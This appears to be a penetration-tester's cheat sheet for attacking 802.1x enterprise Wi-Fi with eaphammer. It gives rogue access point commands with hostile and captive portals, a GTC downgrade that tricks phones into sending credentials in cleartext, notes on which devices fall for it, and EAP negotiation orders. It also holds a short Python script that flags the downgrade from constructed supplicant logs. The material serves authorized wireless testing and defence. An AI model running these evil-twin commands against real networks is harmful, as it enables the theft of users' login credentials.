802.1x

MiTM

./ehdb --add --identity <user> [--password <password> | --nt-hash <NT>]
./eaphammer -i wlan0 -b <BSSID> -e <ESSID> -c <channel> --auth wpa-eap --hostile-portal
./ehdb --add --identity <user> [--password <password> | --nt-hash <NT>]
./eaphammer -i wlan0 -b <BSSID> -e <ESSID> -c <channel> --auth wpa-eap --captive-portal

Stealing credentials - GTC downgrade

Opsec Considerations:

During the negotiation there are two indicators visible on the wireless endpoint: an EAP method is offered that the legitimate AP does not support, and the EAP methods are suggested in a different order.

Effective against Android phones.

Effective against iOS, but the device prompts the user to accept the certificate.

Only a challenge-response against Windows can be captured.

Does not work if:
- the supplicant uses a certificate based authentication since there is no inner authentication
- the supplicant validates the server certificate
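The two indicators above are the ones a defender can check for on the endpoint. The following is an added example, not part of the original notes and not eaphammer's code, that reads constructed supplicant log lines (the "proposed method X" format and the sample lines are assumptions made for this example, not a real wpa_supplicant capture), compares the offered inner methods with the profile the legitimate AP is known to use, and reports both indicators along with where the first proposal sits on the page's weakest-to-strongest scale:

```python
import re

# Inner (phase 2) EAP methods ordered weakest to strongest, as the page lists them.
WEAK_TO_STRONG = ["GTC", "TTLS-PAP", "MD5", "TTLS-CHAP", "TTLS-MSCHAP",
                  "MSCHAPV2", "TTLS-MSCHAPV2", "TTLS"]

# Phase 2 methods the legitimate AP is known to offer, in its usual order.
# Assumed value for this example; take it from a known-good association.
LEGIT_ORDER = ["MSCHAPV2", "GTC"]

# Constructed log lines mimicking a supplicant debug log (not a real capture).
LEGIT_LOG = """\
EAP: proposed method MSCHAPV2
EAP: proposed method GTC
"""
ROGUE_LOG = """\
EAP: proposed method GTC
EAP: proposed method MSCHAPV2
EAP: proposed method MD5
"""

PROPOSAL_RE = re.compile(r"proposed method ([A-Z0-9-]+)")


def parse_proposals(log_text):
    """Return the inner EAP methods proposed by the authenticator, in order."""
    return PROPOSAL_RE.findall(log_text)


def negotiation_indicators(legit_order, observed_order):
    """Compare observed phase-2 proposals with the legitimate AP's profile.

    Returns (indicator, detail) tuples for the two signs named on the page:
    a method the real AP never offers, and a changed proposal order.
    """
    findings = []
    legit = set(legit_order)
    for method in observed_order:
        if method not in legit:
            findings.append(("unsupported_method", method))
    # Compare only the methods both sides know, so a foreign method is reported
    # once (above) and does not also masquerade as an order change.
    observed_known = [m for m in observed_order if m in legit]
    expected = [m for m in legit_order if m in set(observed_order)]
    if observed_known != expected:
        findings.append(("order_mismatch", f"{expected} -> {observed_known}"))
    return findings


def downgrade_rank(observed_order):
    """Position of the first proposal on the weakest-to-strongest scale (0 = GTC).

    Returns None when the first method is not on that scale.
    """
    if not observed_order:
        return None
    first = observed_order[0]
    return WEAK_TO_STRONG.index(first) if first in WEAK_TO_STRONG else None


def analyze(log_text, legit_order=LEGIT_ORDER):
    """Parse a log and return the indicators plus the rank of the first offer."""
    observed = parse_proposals(log_text)
    return {
        "observed": observed,
        "indicators": negotiation_indicators(legit_order, observed),
        "first_offer_rank": downgrade_rank(observed),
    }


if __name__ == "__main__":
    for name, log in (("legit", LEGIT_LOG), ("rogue", ROGUE_LOG)):
        print(name, analyze(log))
```

A rank of 0 on the first proposal means the authenticator led with GTC, which is the profile the gtc-downgrade mode produces; an empty indicator list means the exchange matched the legitimate AP's known behaviour.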

Balanced Approach (default)

Phase 1 (outer authentication):

PEAP,TTLS,TLS,FAST

Phase 2 (inner authentication):

GTC,MSCHAPV2,TTLS-MSCHAPV2,TTLS,TTLS-CHAP,TTLS-PAP,TTLS-MSCHAP,MD5

./eaphammer -i <wlan0> --auth wpa-eap -e <ESSID> --creds -c <same_channel> -b <similar_BSSID>

Weakest to strongest

Phase 1 (outer authentication)

PEAP,TTLS,TLS,FAST

Phase 2 (inner authentication)

GTC,TTLS-PAP,MD5,TTLS-CHAP,TTLS-MSCHAP,MSCHAPV2,TTLS-MSCHAPV2,TTLS

./eaphammer -i <wlan0> --negotiate weakest --auth wpa-eap -e <ESSID> --creds -c <channel> -b <BSSID>

Explicit GTC downgrade

./eaphammer -i <wlan0> --negotiate gtc-downgrade --auth wpa-eap -e <ESSID> --creds -c <channel> -b <BSSID>